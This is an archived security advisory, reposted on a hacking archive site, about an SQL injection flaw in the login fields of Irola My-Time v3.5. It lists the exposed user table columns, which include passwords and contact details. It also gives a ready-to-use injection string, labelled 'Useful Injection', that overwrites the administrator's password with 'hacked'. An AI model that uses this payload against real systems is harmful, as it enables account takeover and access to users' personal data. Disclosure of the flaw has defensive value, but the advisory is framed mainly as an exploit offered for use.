AOH :: HP Unsorted I :: TB13546.HTM

Irola My-Time v3.5 SQL Injection



Aria-Security.net: Irola My-Time v3.5 SQL Injection
Aria-Security.net: Irola My-Time v3.5 SQL Injection



Aria-Security Team=0D
http://Aria-Security.Net=0D 
-----------------------------=0D
Original Advisory (and more details) @ http://aria-security.net/forum/showthread.php?p=1106=0D 
Irola My-Time v3.5=0D
http://www.irola.com=0D 
=0D
=0D
Username/Password Fields can run SQL Queries. Therefore:=0D
We get the Tables:=0D
=0D
UserInfo.UserID=0D
UserInfo.Login=0D
UserInfo.Password=0D
UserInfo.UserNumber=0D
UserInfo.FirstName=0D
UserInfo.LastName=0D
UserInfo.TeamID=0D
UserInfo.Address=0D
UserInfo.City=0D
UserInfo.ZipCode=0D
UserInfo.CountryID=0D
UserInfo.Phone=0D
=0D
=0D
=0D
Useful Injection: (changes admin's passwsord to hacked)=0D
-1' UPDATE UserInfo set Password= 'hacked' Where(UserID= '1');--=0D
=0D
MORE HELP AT the Original Page.=0D
=0D
Greetz: AurA=0D
Credits goes to Aria-Security Team=0D
Regards,=0D
The-0utl4w

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.